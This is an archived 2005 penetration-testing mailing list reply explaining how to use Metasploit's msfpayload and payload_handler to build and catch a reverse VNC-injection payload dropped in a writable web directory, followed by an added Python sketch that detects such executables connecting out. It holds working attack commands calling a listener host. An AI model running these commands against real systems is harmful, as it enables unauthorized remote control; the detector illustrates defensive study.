Penetration Testing mailing list archives
Re: How to get a reverse Shell / VNC from a writable directory on a remote web server.
From: H D Moore <sflist () digitaloffense net>
Date: Fri, 5 Aug 2005 15:16:52 -0500
On Friday 05 August 2005 06:02, AsTriXs wrote:
> Does Metasploit provide an option?
You *might* be able to use msfpayload and the payload_handler exploit to do this, but for reasons I have yet to investigate, the VNC payload isn't working well under the exe loader. The process for this is:

1) Generate an executable:
$ msfpayload win32_reverse_vncinject LHOST=1.2.3.4 LPORT=3333 X > test.exe

2) Copy the executable to your target somehow.

3) Start up the Framework with the payload_handler exploit module:
$ msfcli payload_handler PAYLOAD=win32_reverse_vncinject LHOST=1.2.3.4 LPORT=3333 E

4) Execute the standalone payload stager on the target system.

5) Enjoy your happy VNC access, assuming you have write access to the current interactive desktop.

This process has been tested with most of the win32 Metasploit payloads, but YMMV. This is a handy way to load up meterpreter via client-side execution bugs too ;-)

-HD
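Seen from the defending side, steps 2 to 4 above leave a correlatable trace: an executable under a web-writable directory is started and then connects out to the listening handler. The Python sketch below is an added example, not part of the original message or of Metasploit; the event schema, the writable directory, the web server process names and the idea that the web server launches the file are assumptions, and the events are constructed (reusing the message's placeholder test.exe, 1.2.3.4 and 3333).

```python
import ipaddress
from pathlib import PureWindowsPath

# Assumptions for this sketch (not taken from the original message):
WEB_WRITABLE_ROOTS = [PureWindowsPath(r"C:\Inetpub\wwwroot\uploads")]
WEB_SERVER_IMAGES = {"w3wp.exe", "inetinfo.exe", "httpd.exe"}

# Constructed sample events in a simplified, hypothetical schema.
EVENTS = [
    {"type": "proc", "pid": 410, "parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Inetpub\wwwroot\uploads\test.exe"},
    {"type": "net", "pid": 410, "dst": "1.2.3.4", "dport": 3333},
    {"type": "proc", "pid": 522, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\App\app.exe"},
    {"type": "net", "pid": 522, "dst": "10.0.0.8", "dport": 443},
    {"type": "proc", "pid": 633, "parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Inetpub\wwwroot\Uploads\resize.exe"},
]

def in_writable_root(image):
    """True if the image lives under a web-writable root (case-insensitive)."""
    path = PureWindowsPath(image)
    return any(root in path.parents for root in WEB_WRITABLE_ROOTS)

def is_external(addr):
    """True for destinations outside private address space."""
    return not ipaddress.ip_address(addr).is_private

def detect(events):
    """Return (suspect processes, alerts for suspects that connect outbound)."""
    suspects, alerts = {}, []
    for ev in events:
        if ev["type"] == "proc":
            parent = PureWindowsPath(ev["parent"]).name.lower()
            if parent in WEB_SERVER_IMAGES and in_writable_root(ev["image"]):
                suspects[ev["pid"]] = ev["image"]
        elif ev["type"] == "net" and ev["pid"] in suspects and is_external(ev["dst"]):
            alerts.append((ev["pid"], suspects[ev["pid"]], ev["dst"], ev["dport"]))
    return suspects, alerts

if __name__ == "__main__":
    suspects, alerts = detect(EVENTS)
    for pid, image in suspects.items():
        print(f"review: pid {pid} started from web-writable path {image}")
    for pid, image, dst, dport in alerts:
        print(f"ALERT: pid {pid} ({image}) connected out to {dst}:{dport}")
```

Process 633 is flagged for review even though it never connects out, since an executable launched from an upload directory warrants a look on its own.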